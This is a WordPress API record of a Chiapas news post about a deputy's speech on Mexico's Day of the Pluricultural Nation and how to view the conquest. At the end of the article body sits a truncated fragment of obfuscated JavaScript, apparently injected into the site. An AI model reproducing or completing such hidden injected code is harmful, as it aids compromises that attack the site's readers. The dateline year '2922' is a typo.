{"id":5809,"date":"2022-10-15T00:09:40","date_gmt":"2022-10-15T00:09:40","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5809"},"modified":"2022-10-15T00:09:40","modified_gmt":"2022-10-15T00:09:40","slug":"el-diputado-por-morena-raul-eduardo-bonifaz-moedano-presento-la-efemeride-con-motivo-del-dia-de-la-nacion-pluricultural","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5809","title":{"rendered":"El Diputado por Morena, Ra\u00fal Eduardo Bonifaz Moedano, present\u00f3 la efem\u00e9ride con motivo del D\u00eda de la Naci\u00f3n Pluricultural"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221013-WA0069.jpg\" alt=\"\" class=\"wp-image-5810\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221013-WA0069.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221013-WA0069-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221013-WA0069-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221013-WA0069-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez Chiapas a 14 de octubre de 2922.- La conmemoraci\u00f3n del D\u00eda de la Naci\u00f3n Pluricultural, m\u00e1s que una celebraci\u00f3n, es la oportunidad propicia para hacer reflexiones y adentrarnos de una manera m\u00e1s prudente e intensa a nuestra historia, se\u00f1al\u00f3 el diputado de MORENA, Ra\u00fal Eduardo Bonifaz Moedano.Bonifaz Moedano sostuvo que se ha cambiado el nombre a una fecha,  celebrada o conmemorada en buena parte del planeta. En M\u00e9xico se ha pasado del D\u00eda de la Raza, propuesto por Jos\u00e9 Vasconcelos, seguramente con la intenci\u00f3n de hacer valer su idea de la \u201craza c\u00f3smica\u201d, a la de D\u00eda de la Naci\u00f3n Pluricultural, que es m\u00e1s adecuado en el M\u00e9xico de hoy. Para el Presidente L\u00f3pez Obrador, -subray\u00f3 el Legislador- la nueva denominaci\u00f3n implica el reconocimiento a la lucha de los pueblos por su dignidad y equidad. Implica un reconocimiento a cinco siglos de resistencias.Hoy, la nominaci\u00f3n impulsada por Vasconcelos no es adecuada, por la sencilla raz\u00f3n de que los estudios hist\u00f3ricos han avanzado y se ha llegado a concluir que el descubrimiento de Am\u00e9rica marc\u00f3 el inicio de la conquista y, consecuentemente, de una dif\u00edcil resistencia de los pueblos que, como se ha dicho, ya ha durado 500 a\u00f1os. Para Bonifaz Moedano aquel encuentro violento de culturas debe ser examinado sin prejuicios cegadores. Al lado de la violencia, tambi\u00e9n llegaron los elementos que conforman nuestra cultura y nuestra identidad. Fueron tiempos en los que, para citar una idea de la doctora Guti\u00e9rrez Muller, los ahora mexicanos nos inventamos. El 12 de Octubre fue un d\u00eda de descubrimientos gigantescos para la humanidad. Es probable que otros europeos hayan llegado antes a las tierras de lo que hoy es nuestro continente, pero todav\u00eda no hay mayores evidencias de ello. Aceptemos que fue posible y que debemos ahondar en esa posibilidad; sin embargo, es claro que el gran impacto social y cultural se genera a partir de la llegada de los espa\u00f1oles en aquel oto\u00f1o de 1492.Por todo lo antes expuesto, Ra\u00fal Bonifaz invit\u00f3 a revisar con objetividad los claros y los muchos oscuros de aquel acontecimiento es una actitud adecuada y esa es mi invitaci\u00f3n hoy.Es obligatorio condenar los abusos, los asesinatos, los enga\u00f1os y la ambici\u00f3n desmedida que tutel\u00f3 la conquista. Pero tambi\u00e9n debemos pensar que al lado de un Pedro de Alvarado hubo un Fray Bartolom\u00e9 de las Casas. Al lado de un N\u00fa\u00f1ez Cabeza de Vaca hubo un Motolin\u00eda o un Vasco de Quiroga. Finalmente, pidi\u00f3 a sus hom\u00f3logos y al pueblo en general: \u201cMostremos nuestra indignaci\u00f3n y revisemos con cuidado la historia de aquellos tiempos. Mostremos nuestra dignidad junto a la madurez como el gran pueblo que somos\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez Chiapas a 14 de octubre de 2922.- La conmemoraci\u00f3n del D\u00eda de la Naci\u00f3n Pluricultural, m\u00e1s que una celebraci\u00f3n, es la oportunidad propicia para hacer reflexiones y adentrarnos de una manera m\u00e1s prudente e intensa a nuestra historia, se\u00f1al\u00f3 el diputado de MORENA, Ra\u00fal Eduardo Bonifaz Moedano.Bonifaz Moedano sostuvo que se ha cambiado &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5810,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5809","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5809","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5809"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5809\/revisions"}],"predecessor-version":[{"id":5811,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5809\/revisions\/5811"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5810"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5809"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5809"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5809"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}